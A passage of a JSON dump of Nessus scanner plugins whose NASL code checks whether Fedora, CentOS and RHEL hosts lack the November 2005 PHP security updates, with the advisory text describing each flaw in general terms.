2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"php-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-bcmath-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-dba-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-debuginfo-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-devel-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-gd-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-imap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-ldap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-mbstring-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-mysql-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-ncurses-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-odbc-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-pear-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-pgsql-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-snmp-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-soap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-xml-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-xmlrpc-5.0.4-10.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-dba / php-debuginfo / php-devel / php-gd / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:47", "description": "This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "Fedora Core 3 : php-4.3.11-2.8 (2005-1061)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:3", "p-cpe:/a:fedoraproject:fedora:php-pgsql", "p-cpe:/a:fedoraproject:fedora:php-gd", "p-cpe:/a:fedoraproject:fedora:php-xmlrpc", "p-cpe:/a:fedoraproject:fedora:php-mysql", "p-cpe:/a:fedoraproject:fedora:php-imap", "p-cpe:/a:fedoraproject:fedora:php-pear", "p-cpe:/a:fedoraproject:fedora:php-ldap", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:php-debuginfo", "p-cpe:/a:fedoraproject:fedora:php-odbc", "p-cpe:/a:fedoraproject:fedora:php-snmp", "p-cpe:/a:fedoraproject:fedora:php-devel", "p-cpe:/a:fedoraproject:fedora:php-mbstring", "p-cpe:/a:fedoraproject:fedora:php-ncurses", "p-cpe:/a:fedoraproject:fedora:php-domxml"], "id": "FEDORA_2005-1061.NASL", "href": "https://www.tenable.com/plugins/nessus/20186", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-1061.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20186);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"FEDORA\", value:\"2005-1061\");\n\n script_name(english:\"Fedora Core 3 : php-4.3.11-2.8 (2005-1061)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-November/001556.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb07e7f7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"php-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-debuginfo-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-devel-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-domxml-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-gd-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-imap-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-ldap-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-mbstring-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-mysql-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-ncurses-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-odbc-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-pear-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-pgsql-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-snmp-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-xmlrpc-4.3.11-2.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-gd / php-imap / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:24:53", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "edition": 26, "published": "2006-07-03T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2005:831)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2006-07-03T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-xmlrpc", "p-cpe:/a:centos:centos:php-ncurses", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2005-831.NASL", "href": "https://www.tenable.com/plugins/nessus/21871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:831 and \n# CentOS Errata and Security Advisory 2005:831 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21871);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:831\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2005:831)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012393.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ba48b5d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012394.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a7b67205\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012395.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?359a2fea\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012400.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?61d76502\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012401.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e53e54cf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012402.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48e764fc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-26.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:33", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "edition": 27, "published": "2005-11-15T00:00:00", "title": "RHEL 3 / 4 : php (RHSA-2005:831)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "id": "REDHAT-RHSA-2005-831.NASL", "href": "https://www.tenable.com/plugins/nessus/20206", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:831. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20206);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:831\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2005:831)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the 